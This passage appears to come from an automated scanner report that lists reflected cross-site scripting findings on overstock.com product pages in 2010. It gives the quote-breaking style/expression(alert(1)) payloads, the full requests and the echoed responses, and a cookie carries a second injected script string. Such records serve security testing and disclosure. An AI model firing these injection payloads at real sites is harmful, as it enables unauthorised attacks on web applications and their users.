Path:   /Home-Garden/Chrome-Five-function-Personal-Handheld-Shower-Head/2073900/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a84ed"style%3d"x%3aexpression(alert(1))"6d161d83ee7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a84ed"style="x:expression(alert(1))"6d161d83ee7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Chrome-Five-function-Personal-Handheld-Shower-Head/2073900/product.html?a84ed"style%3d"x%3aexpression(alert(1))"6d161d83ee7=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:35:18 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:35:18 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:35:18 GMT; Path=/
Set-Cookie: mxcproclicks=2073900|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:35:18 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406918921:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109428

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Ch
...[SNIP]...
<input type="hidden" name="a84ed"style="x:expression(alert(1))"6d161d83ee7" value="1"/>
...[SNIP]...

2.169. http://www.overstock.com/Home-Garden/Chrome-Widespread-Bathroom-Faucet/1893704/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Chrome-Widespread-Bathroom-Faucet/1893704/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8128"style%3d"x%3aexpression(alert(1))"78e6724e003 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c8128"style="x:expression(alert(1))"78e6724e003 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Chrome-Widespread-Bathroom-Faucet/1893704/product.html?c8128"style%3d"x%3aexpression(alert(1))"78e6724e003=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:35:18 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:35:19 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=1893704|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:35:19 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406918965:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:35:19 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=16
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 121369

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Ch
...[SNIP]...
<input type="hidden" name="c8128"style="x:expression(alert(1))"78e6724e003" value="1"/>
...[SNIP]...

2.170. http://www.overstock.com/Home-Garden/City-Scene-Black-White-Bamboo-Print-7-piece-Bed-in-a-Bag-with-Sheet-Set/3442343/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/City-Scene-Black-White-Bamboo-Print-7-piece-Bed-in-a-Bag-with-Sheet-Set/3442343/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 368b2"style%3d"x%3aexpression(alert(1))"ea0d990e260 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 368b2"style="x:expression(alert(1))"ea0d990e260 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/City-Scene-Black-White-Bamboo-Print-7-piece-Bed-in-a-Bag-with-Sheet-Set/3442343/product.html?368b2"style%3d"x%3aexpression(alert(1))"ea0d990e260=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:44:20 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:44:20 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407460933:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970